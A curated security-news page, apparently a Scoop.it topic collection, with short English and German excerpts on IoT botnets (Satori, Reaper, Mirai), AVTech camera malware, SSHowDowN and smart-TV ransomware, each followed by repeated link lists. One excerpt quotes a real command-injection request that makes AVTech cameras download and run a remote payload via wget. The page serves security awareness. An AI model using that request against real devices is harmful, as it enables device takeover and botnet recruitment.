ICT Security-Sécurité PC et Internet

A new massive IoT (Internet of Things) botnet dubbed Satori has emerged, which security researchers fear, can launch crippling attacks at any time. The botnet has reportedly already infected over 280,000 IP addresses in just 12 hours, enslaving hundreds of thousands of home routers by exploiting a recently discovered zero-day vulnerability.

Satori, which reportedly means "awakening" in Japanese, is actually the infamous Mirai botnet's successor. Since Mirai's authors made the botnet's source code public last year, cybercriminals have been pushing out new variants of Mirai.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet&tag=Mirai+Botnet

Laut verschiedenen Sicherheits-Spezialisten braut sich ein gewaltiger DDoS-Cybersturm zusammen. Basis sind massenhaft infizierte IoT-Geräte, die ein riesiges Botnet bilden.

IoTroop / IoT_reaper: Checkpoint verzeichnet zunehmend attackierende IP-Adressen.

(Quelle: Checkpoint) Sowohl Checkpoint als auch Netlab beobachten derzeit den Aufbau eines riesigen Botnets. Das neue Netz trägt den Namen IoTroop beziehungsweise IoT_reaper und besteht hauptsächlich aus vernetzten Geräten aus dem Internet der Dinge. Derzeit können über das Netz zwei Millionen Geräte für DDoS-Angriffe missbraucht werden.

Ungepatchte Sicherheitslücken sind schuld

Im Gegensatz zur letztjährigen Mirai-Attacke, bei der sich Hacker der schwachen Passwörter von IoT-Geräten bedienten, um diese in DDoS-Zombis umzuwandeln, infiltrieren sie diesmal die Geräte über bekannte, aber noch nicht gepatchte Schwachstellen. Die infizierten Bots werden sodann gleich dazu verwendet, weitere verwundbare Geräte zu finden und an das Botnet zu schließen.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet

When IoT devices are everywhere, the security headaches just get worse.

Learn more / En savoir plus / Mehr erfahren: 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.

The ARM malware, detected by security software firm Trend Micro as "ELF_IMEIJ.A," arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

Why, you might ask?

ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.

Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.

The problem is that there is not whitelist-based checking or verification for the exefile parameter of a CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

IT’S WELL KNOWN that the Internet of Things is woefully insecure, but the most shameful and frustrating part is that some of the vulnerabilities that are currently being exploited could have been eradicated years ago. Now evidence of how these bugs are being used in attacks is calling attention to security holes that are long overdue to be plugged.

New research released this week from the content delivery network Akamai takes a closer look at how hackers are abusing weaknesses in a cryptographic protocol to commandeer millions of ordinary connected devices—routers, cable modems, satellite TV equipment, and DVRs—and then coordinate them to mount attacks.

After analyzing IP address data from its Cloud Security Intelligence platform, Akamai estimates that more than 2 million devices have been compromised by this type of hack, which it calls SSHowDowN. The company also says that at least 11 of its customers—in industries like financial services, retail, hospitality, and gaming—have been targets of this attack.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=Smart+Home

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

Researchers are actively tracking a ransomware family whose variants can infect all Android devices, including smart TVs.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

Is your smart home too smart for its own good?

A home full of connected devices like front-door locks, motion sensors, thermostats and smoke alarms all talking to a central hub and controllable via an app is the promise of smart home platforms like Samsung SmartThings. But all that interconnectivity of high-value home devices is also, apparently, catnip to hackers, potential malefactors and enterprising researchers.

SEE ALSO: Amazon Echo Dot gives you a voice-controlled smart home for only $90

A new University of Michigan security study entitled Security Analysis of Emerging Smart Home Applications demonstrates how Samsung's SmartThings platform may be especially vulnerable to hackers. Written by Earlence Fernandes, Jaeyeon Jung, and Atul Prakash (Fernandes and Prakash are both from the University of Michigan, while Jung is part of Microsoft Research), the paper is being presented this month at the upcoming IEEE Symposium on Security and Privacy.

The researchers targeted SmartThings because it, like other emerging smart home platforms, allows third-party app development and there are already a large number of apps and devices that work with it.

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=Smart+Home

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

Reaper is on track to become one of the largest botnets recorded in recent years — and yet nobody seems to know what it will do or when. But researchers say the damage could be bigger than last year's cyberattack.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet

Billions of Internet of Things devices exist in offices and homes across the world, including everything from sensors and home assistants to connected children's toys.

But many producers of IoT devices have rushed out products with almost no thought put into cybersecurity. Not only has this resulted in data breaches as a result of IoT products with weak security, but also ended up with connected devices being roped into botnets and used to carry out DDoS attacks, or being used as an entry-point for hacking into the wider network.

While the idea of IoT devices being exploited to carry out devastating cyberattacks might seem far-fetched, it's worth remembering that technology moves forward at an alarming rate: IoT devices distributed in the next few years could still be operating in ten or twenty years -- with no way of receiving security updates.

That means bugs and vulnerabilities could come to light in that time which just can't be fixed due how the technology is built now.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

Trend Micro is reporting a new threat to Linux-based Internet of Things (IoT) devices that is specifically able to exploit a specific vulnerability in surveillance cameras made by AVTech.
The threat is called ELF_IMEIJ.A and was originally uncovered by Search-Lab in October 2016 and reported to AVTech. Trend Micro said Search-Labs did not received a response regarding the issue.

Much like Mirai, ELF_IMEIJ.A the malware searches for unprotected IoT devices, in this case a camera.
The attacker uses cgi-bin scripts to randomly ping IP addresses searching for a device that is vulnerable.

“Specifically, it exploits CloudSetup.cgi, the reported AVTech CGI Directory vulnerability, to execute a command injection that triggers the malware download. The attacker tricks the device into downloading the malicious file and changes the file's permissions to execute it locally,” Trend wrote.

Search-Labs noted that every user password for the AVTech products is stored in clear text and that an attacker with access to the device itself can easily obtain the full list of passwords.
“By exploiting command injection or authentication bypass issues, the clear text admin password can be retrieved,” Search-Labs initial report on the malware stated.

Learn more / En savoir plus / Mehr erfahren: 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

One of the largest distributed denial-of-service attacks happened this week and almost nobody noticed.

Since the cyberattack on Dyn two weeks ago, the internet has been on edge, fearing another massive attack that would throw millions off the face of the web. The attack was said to be upwards of 1.1 Tbps -- more than double the attack a few weeks earlier on security reporter Brian Krebs' website, which was about 620 Gbps in size, said to be one of the largest at the time. The attack was made possible by the Mirai botnet, an open-source botnet that anyone can use, which harnesses the power of insecure Internet of Things devices.

This week, another Mirai botnet, known as Botnet 14, began targeting a small, little-known African country, sending it almost entirely offline each time.

Security researcher Kevin Beaumont, who was one of the first to notice the attacks and wrote about what he found, said that the attack was one of the largest capacity botnets ever seen.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

Eine Variante der Ransomware Flocker attackiert auch Android-basierte Smart-TVs und erpresst deren Besitzer.
Die Ransomware Flocker treibt schon seit über einem Jahr ihr Unwesen auf Android-Geräten. Die Bildschirme der befallenen Geräte werden gesperrt und die Besitzer werden zur Zahlung eines Lösegelds erpresst, um wieder den Zugriff auf das Gerät zu erhalten. Seit Mai 2015 haben die Sicherheitsexperten von Trend Micro laut eigenen Angaben über 7.000 Varianten von Flocker gesammelt. Allein seit Mitte April 2016 gab es über 1.200 neue Varianten.

Und eine dieser jüngeren Varianten befällt auch Smart-TVs und erpresst deren Besitzer. Dabei wird der Bildschirm des Smart-TV gesperrt und auf dem Fernseher erscheint ein Warnhinweis, der von einer US Cyber-Polizei oder einer anderen angeblichen Strafverfolgungsbehörde stamme. Dem Smart-TV-Besitzer wird erklärt, er habe gegen Gesetze verstoßen. Die Strafe solle mittels iTunes Geschenkkarten im Wert von 200 US-Dollar beglichen werden. Erst dann erhalte der Nutzer wieder den vollen Zugriff auf den Fernseher.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

Samsung verliert gegen die Verbrauchzentrale. Dem Hersteller wurde unrechtmäßige Übermittlung von personenbezogenen Daten durch den Smart-TV UE40H6270 vorgeworfen. Jetzt muss der Hersteller handeln.

Learn more / En savoir plus / Mehr erfahren:

https://gustmees.wordpress.com/2013/12/21/privacy-in-the-digital-world-shouldnt-we-talk-about-it/

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

It's inevitable cybercriminals will target the Internet of Things (IoT) with ransomware, because connected devices provide a huge opportunity for criminals to launch attacks, a cybersecurity think tank has warned.

The Institute for Critical Infrastructure Technology (ICIT) describes the rise of malware as an "epidemic", and says the IoT is at particular risk. The think tank believes it is not inconceivable that malware, and ransomware in particular, will eventually target IoT devices -- which means a huge range of potential targets.

The major risk surrounding the IoT, according to report authors -- James Scott, senior fellow at the Institute for Critical Infrastructure Technology, and Drew Spaniel, ICIT visiting scholar at Carnegie Mellon University -- is that it represents "practically an infinite attack surface" for cybercriminals to take advantage of.

Learn more / En savoir plus / Mehr erfahren:

http://www.scoop.it/t/ict-security-tools/?tag=Ransomware

http://www.scoop.it/t/securite-pc-et-internet/?tag=RANSOMWARE

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars